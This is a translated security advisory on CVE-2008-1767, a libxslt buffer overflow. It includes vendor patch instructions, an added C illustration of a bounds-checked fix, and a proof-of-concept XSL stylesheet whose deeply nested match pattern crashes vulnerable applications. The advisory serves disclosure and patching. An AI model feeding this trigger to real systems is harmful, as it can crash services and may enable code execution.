libxslt XSL File Processing Buffer Overflow Vulnerability

Release date: 2008-05-21
Updated: 2008-05-29

Affected systems:
XMLSoft libxslt < 1.1.24
Unaffected systems:
XMLSoft libxslt 1.1.24
Description:
BUGTRAQ  ID: 29312
CVE(CAN) ID: CVE-2008-1767

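Libxslt is the XSLT C library developed for the GNOME project; XSLT itself is an XML language for defining XML transformations.

The libxslt library uses a fixed-size array while transforming XML documents. If an XSL stylesheet file sets a particular template match condition, an application using the library triggers a buffer overflow when parsing the file, causing the application to crash or execute arbitrary instructions.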

<*Source: Anthony de Almeida Lopes
  
  Links: http://secunia.com/advisories/30315/
        http://bugzilla.gnome.org/show_bug.cgi?id=527297
        https://bugzilla.redhat.com/long_list.cgi?buglist=446809
        https://www.redhat.com/support/errata/RHSA-2008-0287.html
        http://www.debian.org/security/2008/dsa-1589
        http://security.gentoo.org/glsa/glsa-200806-02.xml
*>

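Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!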

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:output method="xml"/>

<xsl:template
match="html/body/table/tr/td/div/div/div/div/div/div/div/div/table/tr/td/table/tr/td/p/b">
        <xsl:if test="contains(text(), 'published')">
                <found/>
        </xsl:if>
</xsl:template>
</xsl:stylesheet>
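
The bug class described above, as an added example that is not libxslt's code: a compiled match pattern stored in a fixed-size array, with the bounds check that keeps a long pattern from writing past it. The names, the capacity of 40 and the two-ops-per-step model are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_OPS 40              /* assumed capacity, chosen for illustration */

enum op_kind { OP_ELEM, OP_PARENT };
struct op { enum op_kind kind; const char *name; size_t len; };

struct comp_match {
    struct op ops[MAX_OPS];     /* fixed-size array filled from the pattern */
    size_t nb_ops;
};

/* The unsafe form is a bare `c->ops[c->nb_ops++] = o;`. The stylesheet
 * decides how often this runs, so a long pattern writes past ops[]. */
static int add_op(struct comp_match *c, struct op o)
{
    if (c->nb_ops >= MAX_OPS)
        return -1;              /* refuse instead of writing out of bounds */
    c->ops[c->nb_ops++] = o;
    return 0;
}

/* Simplified model: one ELEM op per name, one PARENT op per '/'.
 * Returns the number of ops, or -1 if the pattern does not fit. */
int compile_match(struct comp_match *c, const char *pattern)
{
    const char *p = pattern;
    c->nb_ops = 0;
    while (*p) {
        size_t len = strcspn(p, "/");
        struct op elem = { OP_ELEM, p, len };
        struct op parent = { OP_PARENT, NULL, 0 };
        if (len > 0 && add_op(c, elem) != 0)
            return -1;
        p += len;
        if (*p == '/' && add_op(c, parent) != 0)
            return -1;
        if (*p == '/')
            p++;
    }
    return (int)c->nb_ops;
}

int main(void)
{
    struct comp_match c;
    printf("%d\n", compile_match(&c, "html/body/p"));   /* 5 */
    return 0;
}
```

Under this model the 21-step pattern from the test stylesheet needs 41 ops, so `compile_match` returns -1 with the array full rather than overflowing it.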

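Recommendations:
Vendor patches:

Debian
------
Debian has released a security advisory (DSA-1589-1) and corresponding patches for this issue:
DSA-1589-1: New libxslt packages fix execution of arbitrary code
Link: http://www.debian.org/security/2008/dsa-1589

Patch downloads (libxslt 1.1.19-2 packages, listed in the advisory linked above):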

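Patch installation:

1. Install the patch package manually:

  First, download the patch package with the following command:
  # wget url  (url is the patch download link)

  Then install the patch with the following command:
  # dpkg -i file.deb (file is the name of the corresponding patch package)

2. Install the patch packages automatically with apt-get:

   First, update the internal database with the following command:
   # apt-get update

   Then install the updated packages with the following command:
   # apt-get upgrade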

RedHat
------
RedHat has released a security advisory (RHSA-2008:0287-01) and corresponding patches for this issue:
RHSA-2008:0287-01: Important: libxslt security update
Link: https://www.redhat.com/support/errata/RHSA-2008-0287.html

Gentoo
------
Gentoo has released a security advisory (GLSA-200806-02) and corresponding patches for this issue:
GLSA-200806-02: libxslt: Execution of arbitrary code
Link: http://security.gentoo.org/glsa/glsa-200806-02.xml

All libxslt users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/libxslt-1.1.24"

XMLSoft
-------
The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's site:

http://bugzilla.gnome.org/attachment.cgi?id=109216&action=view
http://svn.gnome.org/viewvc/libxslt/trunk/libxslt/pattern.c?r1=1469&r2=1468&pathrev=1469

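This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.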